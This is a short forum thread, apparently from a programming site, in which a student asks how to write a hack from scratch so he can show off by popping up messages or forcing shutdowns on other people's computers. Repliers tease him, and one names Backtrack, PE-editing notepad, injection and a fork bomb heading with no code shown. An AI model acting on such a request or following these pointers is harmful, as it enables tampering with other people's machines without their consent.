Whenever I tell anybody under the age of 20 that I am a programmer, they always ask the same question sooner or later: "Can you hack my computer." I tell them that even if I could I wouldn't. They follow up by telling me to just make a pop-up or something. When I tell them that I can't because I don't know how they tend to think that I am a bad programmer. I don't care too much about that, but now I am getting ready to get a job (going into co-op at waterloo) and since I went to a private school that was more expensive than university, a lot of my friends' parents may very well become my future bosses (I am not kidding, if you need proof I can give it). Basically I want to be able to prove my 'programming prowess' by at least maybe launching a pop-up window, or running a dll command (like shutdown with a long time delay, followed by a deactivation [something I know how to write in batch]) When I started doing research into it I found that most people only offer 'hacking tools', preprogrammed software that merely gives you control over other's computers and then you can play with their mind. This is not what I want. I want to be able to do what I think best suits my needs (usually that would be a pop-up window with a clever message). I want to be able to program a hack from scratch. This is really not my expertise, and I do not intend to do anything malicious with any information given to me, I just want to be able to prove that I at least know how hacking is done. Thank you.

Recommended Answers

All 11 Replies

Are you sure you're not a bad programmer? Because your logic is atrocious. ;)

Are you sure you're not a bad programmer? Because your logic is atrocious. ;)

LOL..

@OP. I started out with Backtrack but you said you want something from scratch. Does it have to be complicated like PE-Editing notepad/calculator to load a messagebox? Injection?

Neat ForkBomb: